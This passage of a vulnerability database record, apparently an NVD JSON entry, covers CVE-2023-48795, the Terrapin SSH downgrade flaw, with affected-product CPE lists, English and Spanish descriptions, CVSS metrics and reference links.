"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ssh2_project:ssh2:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "69510F52-C699-4E7D-87EF-7000682888F0",
"versionEndIncluding": "1.11.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:proftpd:proftpd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9461430B-3709-45B6-8858-2101F5AE4481",
"versionEndIncluding": "1.3.8b",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:freebsd:freebsd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B9A01DF3-E20E-4F29-B5CF-DDF717D01E74",
"versionEndIncluding": "12.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:crates:thrussh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D25EB73D-6145-4B7D-8F14-80FD0B458E99",
"versionEndExcluding": "0.35.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tera_term_project:tera_term:*:*:*:*:*:*:*:*",
"matchCriteriaId": "77594DEC-B5F7-4911-A13D-FFE91C74BAFA",
"versionEndIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oryx-embedded:cyclone_ssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8FF7E74-2351-4CD9-B717-FA28893293A1",
"versionEndExcluding": "2.3.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82A93C12-FEB6-4E82-B283-0ED7820D807E",
"versionEndIncluding": "10.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netsarang:xshell_7:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B480AE79-2FA1-4281-9F0D-0DE812B9354D",
"versionEndExcluding": "build__0144",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:paramiko:paramiko:*:*:*:*:*:*:*:*",
"matchCriteriaId": "826B6323-06F8-4B96-8771-3FA15A727B08",
"versionEndExcluding": "3.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openstack_platform:16.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DCC81071-B46D-4F5D-AC25-B4A4CCC20C73",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openstack_platform:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4B3000D2-35DF-4A93-9FC0-1AD3AB8349B8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openstack_platform:17.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E315FC5C-FF19-43C9-A58A-CF2A5FF13824",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:ceph_storage:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA7EAD12-E398-44AF-9859-F3CA6C63BA6B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_serverless:-:*:*:*:*:*:*:*",
"matchCriteriaId": "77675CB7-67D7-44E9-B7FF-D224B3341AA5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_gitops:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C0AAA300-691A-4957-8B69-F6888CC971B1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_pipelines:-:*:*:*:*:*:*:*",
"matchCriteriaId": "45937289-2D64-47CB-A750-5B4F0D4664A0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_developer_tools_and_services:-:*:*:*:*:*:*:*",
"matchCriteriaId": "97321212-0E07-4CC2-A917-7B5F61AB9A5A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_data_foundation:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0E2C021C-A9F0-4EB4-ADED-81D8B57B4563",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_api_for_data_protection:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7BF8EFFB-5686-4F28-A68F-1A8854E098CE",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_virtualization:4:*:*:*:*:*:*:*",
"matchCriteriaId": "9C877879-B84B-471C-80CF-0656521CA8AB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:storage:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "379A5883-F6DF-41F5-9403-8D17F6605737",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:discovery:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B5B1D946-5978-4818-BF21-A43D9C1365E1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_dev_spaces:-:*:*:*:*:*:*:*",
"matchCriteriaId": "99B8A88B-0B31-4CFF-AFD7-C9D3DDD5790D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:cert-manager_operator_for_red_hat_openshift:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6D5A7736-A403-4617-8790-18E46CB74DA6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:keycloak:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6E0DE4E1-5D8D-40F3-8AC8-C7F736966158",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "88BF3B2C-B121-483A-AEF2-8082F6DA5310",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:advanced_cluster_security:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0FD736A-8730-446A-BA3A-7B608DB62B0E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:advanced_cluster_security:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4C504B6-3902-46E2-82B7-48AEC9CDD48D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:golang:crypto:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F92E56DF-98DF-4328-B37E-4D5744E4103D",
"versionEndExcluding": "0.17.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:russh_project:russh:*:*:*:*:*:rust:*:*",
"matchCriteriaId": "AC12508E-3C31-44EA-B4F3-29316BE9B189",
"versionEndExcluding": "0.40.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sftpgo_project:sftpgo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1750028C-698D-4E84-B727-8A155A46ADEB",
"versionEndExcluding": "2.5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:erlang:erlang\\/otp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B38C0997-A8CC-473C-98CF-641FD21EB411",
"versionEndExcluding": "22.3.4.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:erlang:erlang\\/otp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5887F3E2-9214-4FAE-8768-441D770E27C0",
"versionEndExcluding": "23.3.4.20",
"versionStartIncluding": "23.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:erlang:erlang\\/otp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8D7CB988-94C4-45BE-AD9D-9C16899A71DF",
"versionEndExcluding": "24.3.4.15",
"versionStartIncluding": "24.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:erlang:erlang\\/otp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB749F4B-99FC-4AE8-BDB3-85B081B52F82",
"versionEndExcluding": "25.3.2.8",
"versionStartIncluding": "25.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:erlang:erlang\\/otp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2380909A-BA9B-4A76-82F2-D2D0EF242E57",
"versionEndExcluding": "26.2.1",
"versionStartIncluding": "26.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:matez:jsch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "61119DB3-4336-4D3B-863A-0CCF4146E5C1",
"versionEndExcluding": "0.2.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libssh2:libssh2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BFDD272-3DF0-4E3F-B69A-E7ABF4B18B24",
"versionEndExcluding": "1.11.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:asyncssh_project:asyncssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAE46983-0ABC-49F7-AC18-A78FAC7E73AA",
"versionEndExcluding": "2.14.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dropbear_ssh_project:dropbear_ssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "06BF3368-F232-4E6B-883E-A591EED5C827",
"versionEndExcluding": "2022.83",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jadaptive:maverick_synergy_java_ssh_api:*:*:*:*:*:*:*:*",
"matchCriteriaId": "36531FB6-5682-4BF1-9785-E9D6D1C4207B",
"versionEndExcluding": "3.1.0-snapshot",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ssh:ssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A86A51EA-B501-42F8-91E6-4EA97DED767C",
"versionEndExcluding": "4.9.1.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ssh:ssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "70989970-E224-4D1C-941E-BBFB2AE7285C",
"versionEndExcluding": "4.11.1.7",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ssh:ssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7819CE3-2849-4D15-874B-F6A68EF6D65F",
"versionEndExcluding": "4.13.2.4",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ssh:ssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F6A4DD8B-06AD-4F13-8F7E-1E2AAF81C119",
"versionEndExcluding": "4.15.3.1",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ssh:ssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D91ED5E1-1D75-4B63-B0A2-B2EB6D4AC685",
"versionEndExcluding": "5.1.1",
"versionStartIncluding": "5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:thorntech:sftp_gateway_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "83B1AF39-C0B9-4031-B19A-BDDD4F337273",
"versionEndExcluding": "3.4.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netgate:pfsense_plus:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2B71B0EF-888E-45E2-A055-F59CDCC1AFC7",
"versionEndIncluding": "23.09.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netgate:pfsense_ce:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8F23CDF7-2881-4B4E-B84F-4E04F4ED8CCF",
"versionEndIncluding": "2.7.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C1795F7A-203F-400E-B09C-0FAF16D01CFC",
"versionEndExcluding": "10.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:connectbot:sshlib:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0D79DDDD-02F0-4C12-BE7F-1B9DF1722C7A",
"versionEndExcluding": "2.2.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:sshd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2D7B0CA-C01F-4296-9425-48299E3889C5",
"versionEndIncluding": "2.11.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:sshj:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C3EB0B8-9E76-4146-AB02-02E20B91D55C",
"versionEndIncluding": "0.37.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tinyssh:tinyssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0582468A-149B-429F-978A-2AEDF4BE2606",
"versionEndIncluding": "20230101",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:trilead:ssh2:6401:*:*:*:*:*:*:*",
"matchCriteriaId": "7E4BAF06-5A79-46D7-8C4F-E670BD6B7C2D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:9bis:kitty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "98321BF9-5E8F-4836-842C-47713B1C2775",
"versionEndIncluding": "0.76.1.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gentoo:security:-:*:*:*:*:*:*:*",
"matchCriteriaId": "76BDAFDE-4515-42E6-820F-38AF4A786CF2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5920923E-0D52-44E5-801D-10B82846ED58",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*",
"matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*",
"matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "73160D1F-755B-46D2-969F-DF8E43BB1099",
"versionEndExcluding": "14.4",
"versionStartIncluding": "14.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH\u0027s use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust."
},
{
"lang": "es",
"value": "El protocolo de transporte SSH con ciertas extensiones OpenSSH, que se encuentra en OpenSSH anterior a 9.6 y otros productos, permite a atacantes remotos eludir las comprobaciones de integridad de modo que algunos paquetes se omiten (del mensaje de negociaci\u00f3n de extensi\u00f3n) y, en consecuencia, un cliente y un servidor pueden terminar con una conexi\u00f3n para la cual algunas caracter\u00edsticas de seguridad han sido degradadas o deshabilitadas, tambi\u00e9n conocido como un ataque Terrapin. Esto ocurre porque SSH Binary Packet Protocol (BPP), implementado por estas extensiones, maneja mal la fase de protocolo de enlace y el uso de n\u00fameros de secuencia. Por ejemplo, existe un ataque eficaz contra ChaCha20-Poly1305 (y CBC con Encrypt-then-MAC). La omisi\u00f3n se produce en chacha20-poly1305@openssh.com y (si se utiliza CBC) en los algoritmos MAC -etm@openssh.com. Esto tambi\u00e9n afecta a Maverick Synergy Java SSH API anterior a 3.1.0-SNAPSHOT, Dropbear hasta 2022.83, Ssh anterior a 5.1.1 en Erlang/OTP, PuTTY anterior a 0.80 y AsyncSSH anterior a 2.14.2; y podr\u00eda haber efectos en Bitvise SSH hasta la versi\u00f3n 9.31, libssh hasta la 0.10.5 y golang.org/x/crypto hasta el 17 de diciembre de 2023."
}
],
"id": "CVE-2023-48795",
"lastModified": "2025-11-04T22:15:55.110",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2023-12-18T16:15:10.897",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/176280/Terrapin-SSH-Connection-Weakening.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2024/Mar/21"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/18/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/19/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Mitigation"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/20/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/03/06/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/17/8"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/cve-2023-48795"
},
{
"source": "cve@mitre.org",
"tags": [
"Press/Media Coverage"
],
"url": "https://arstechnica.com/security/2023/12/hackers-can-break-ssh-channel-integrity-using-novel-data-corruption-attack/"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://bugs.gentoo.org/920280"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254210"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1217950"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://crates.io/crates/thrussh/versions"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://filezilla-project.org/versions.php"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://forum.netgate.com/topic/184941/terrapin-ssh-attack"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://git.libssh.org/projects/libssh.git/commit/?h=stable-0.10\u0026id=10e09e273f69e149389b3e0e5d44b8c221c2e7f6"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/NixOS/nixpkgs/pull/275249"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/issues/2189"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/releases/tag/v9.5.0.0p1-Beta"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/TeraTermProject/teraterm/commit/7279fbd6ef4d0c8bdd6a90af4ada2899d786eec0"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/TeraTermProject/teraterm/releases/tag/v5.1"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/advisories/GHSA-45x7-px36-x8w8"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/apache/mina-sshd/issues/445"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/connectbot/sshlib/commit/5c8b534f6e97db7ac0e0e579331213aa25c173ab"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/connectbot/sshlib/compare/2.2.21...2.2.22"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/cyd01/KiTTY/issues/520"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/drakkan/sftpgo/releases/tag/v2.5.6"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/erlang/otp/blob/d1b43dc0f1361d2ad67601169e90a7fc50bb0369/lib/ssh/doc/src/notes.xml#L39-L42"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/erlang/otp/releases/tag/OTP-26.2.1"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/golang/crypto/commit/9d2ee975ef9fe627bf0a6f01c1f69e8ef1d4f05d"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/hierynomus/sshj/issues/916"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/janmojzis/tinyssh/issues/81"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/jtesta/ssh-audit/commit/8e972c5e94b460379fe0c7d20209c16df81538a5"
},
{
"source": "cve@mitre.org",
"tags": [
"Mitigation"
],
"url": "https://github.com/libssh2/libssh2/pull/1291"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/mkj/dropbear/blob/17657c36cce6df7716d5ff151ec09a665382d5dd/CHANGES#L25"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/mscdex/ssh2/commit/97b223f8891b96d6fc054df5ab1d5a1a545da2a3"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/mwiede/jsch/compare/jsch-0.2.14...jsch-0.2.15"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mwiede/jsch/issues/457"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/mwiede/jsch/pull/461"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/net-ssh/net-ssh/blob/2e65064a52d73396bfc3806c9196fc8108f33cd8/CHANGES.txt#L14-L16"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/openssh/openssh-portable/commits/master"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/paramiko/paramiko/issues/2337"
},
{
